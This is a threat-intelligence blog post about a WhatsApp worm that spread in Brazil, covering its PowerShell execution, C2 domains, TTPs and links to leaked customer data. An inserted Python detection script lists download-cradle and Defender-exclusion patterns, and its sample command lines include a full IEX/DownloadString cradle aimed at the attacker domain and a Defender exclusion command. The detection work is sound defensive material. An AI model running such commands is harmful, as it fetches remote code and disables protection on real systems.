On September 30 and October 1, detections and reports indicated massive message deliveries to multiple WhatsApp users in Brazil. The messages prompted recipients to open, via WhatsApp Web or the desktop application, an attached ZIP file. Initially, information about the incidents was limited, with only a few indicators linked to two main domains: zapgrande[.]com and sorvetenopote[.]com. 

As evidence accumulated, we identified behavior consistent with a worm. Once the victim was infected, the mechanism leveraged the contact list in the application to resend the same message and attachment to additional users. This propagation pattern enabled rapid dissemination within the first 24 hours of the event. 

Upon infection, clicking the attachment triggered the execution of an encoded PowerShell command responsible for downloading and running code in memory — a fileless technique. All activity originated from infrastructure hosted on one of the associated domains. 

In parallel, another detected PowerShell command attempted to create exclusions in the host’s protection mechanism (Microsoft Defender). The procedure involved adding a process to the antivirus exclusion list, indicating a deliberate attempt to reduce local defense visibility. 
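As an added example (not code from the iT.eam report), the following Python tags process command lines for the two PowerShell behaviours described above: it decodes a `-EncodedCommand` argument (base64 of UTF-16LE), searches both the raw line and the decoded script for in-memory download cradles and Microsoft Defender exclusion changes, and matches the two domains named in the report. The sample command lines are constructed; the script text, process name and paths in them are placeholders.

```python
import base64
import re
from typing import List, Optional

# Domains named in the report, kept defanged exactly as published.
KNOWN_C2_DOMAINS = {"zapgrande[.]com", "sorvetenopote[.]com"}
# Patterns for the behaviours described above: encoded command, in-memory download, Defender exclusion.
ENCODED_FLAG = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"\b(DownloadString|DownloadData|Invoke-WebRequest|iwr|IEX|Invoke-Expression)\b", re.I)
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\s+-Exclusion(Process|Path|Extension)", re.I)

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE); None if absent or malformed."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline: str) -> List[str]:
    """Tag one command line; the decoded script is searched together with the raw line."""
    tags = []
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    if decoded is not None:
        tags.append("encoded_powershell")
    if DOWNLOAD_CRADLE.search(text):
        tags.append("download_cradle")
    if DEFENDER_EXCLUSION.search(text):
        tags.append("defender_exclusion")
    if any(d.replace("[.]", ".") in text.lower() for d in KNOWN_C2_DOMAINS):
        tags.append("known_c2_domain")
    return tags

def encode_for_powershell(script: str) -> str:
    """Build the base64(UTF-16LE) form PowerShell accepts; used here only to construct sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation command lines, not logs captured from the incident.
SAMPLE_LOGS = [
    "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_for_powershell(
        "IEX (New-Object Net.WebClient).DownloadString('https://zapgrande.com/placeholder')"),
    "powershell.exe -Command Add-MpPreference -ExclusionProcess 'placeholder.exe'",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Public\\placeholder.ps1",
    "notepad.exe C:\\Users\\user\\notes.txt",
]
```

Running `classify` over each entry of `SAMPLE_LOGS` yields the tags for the first two lines and nothing for the last two, which is the split a SIEM rule built from these patterns would produce.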

The iT.eam CTI Team’s Response to the WhatsApp Attacks 

Following the first detections, iT.eam’s Cyber Threat Intelligence (CTI) team immediately initiated preventive procedures: 

  • Creation and deployment of rules in the SIEM and security tools to capture known IOCs 
  • Blocking of malicious domains and URLs 
  • Continuous pivoting to identify additional domains and infrastructure connected to the attackers 

This effort enriched our rule sets and reference lists, expanding detection coverage and enabling more robust correlation capabilities. 

Technical Behavior Analysis  

During malicious execution, a BAT file was created in the user’s startup folder, with no apparent persistent modifications to system registry keys. Alongside this BAT file, multiple JavaScript scripts were added, acting as follows within the context of WhatsApp Web: 

  1. The malware checked for active sessions 
  2. It repeatedly sent the attached file to contacts in the active session 
  3. It maintained regular communication with the domain zapgrande[.]com 

This domain operated as a command-and-control (C2) server, as evidenced by captured traffic during network analysis. 

Despite its broad propagation, the worm’s behavior proved relatively simple from a technical standpoint — reinforcing a critical point: social engineering and user curiosity remain decisive infection vectors. Even low-sophistication malware can cause significant impact when anchored in real contact lists and well-targeted social engineering campaigns. 

Tactics, Techniques, and Procedures (TTPs) Identified in the WhatsApp Attacks

Below are some of the TTPs associated with this threat: 

  • Initial Access: TA0001
    Phishing: T1566
  • Execution: TA0002
    Command and Scripting Interpreter: PowerShell: T1059.001
  • Defense Evasion: TA0005
    Obfuscated Files or Information: Command Obfuscation: T1027
  • Command and Control (C2): TA0011

The Importance of a Mature CTI Team 

It is common to assume that campaigns of this nature start from randomly chosen phone numbers. However, the investigation conducted by iT.eam’s CTI team revealed a more sophisticated and opportunistic pattern.

Throughout September 2025, there was a significant increase in the availability and exposure of Brazilian customer databases. Free samples containing between 1,000 and 5,000 records were frequently shared in forums and online groups. 

Many of these data breaches were directly or indirectly linked to actors operating in Russian-language forums, both on the clearnet and in more restricted environments such as the dark web and Telegram channels. From these datasets, malicious actors can extract phone numbers, email addresses, and other valuable metadata for targeted campaigns — facilitating the success of phishing schemes and self-propagating worms. 

The investigation into this incident clearly demonstrates the strategic importance of having a mature and integrated Cyber Threat Intelligence capability. CTI goes beyond collecting IOCs: it transforms scattered indicators into actionable intelligence, enables smarter response prioritization, and significantly reduces the time between detection and containment. In the specific case of the WhatsApp attacks that began on September 30, 2025, the integrated efforts of collection, analysis, and dissemination of intelligence were crucial to mitigating the overall impact.

Want to protect your organization from attacks like those that targeted WhatsApp? Contact our specialists to learn more about the work carried out by iT.eam’s CTI team! 

Gabriel Alves, Cyber Threat Intelligence Trainee at iT.eam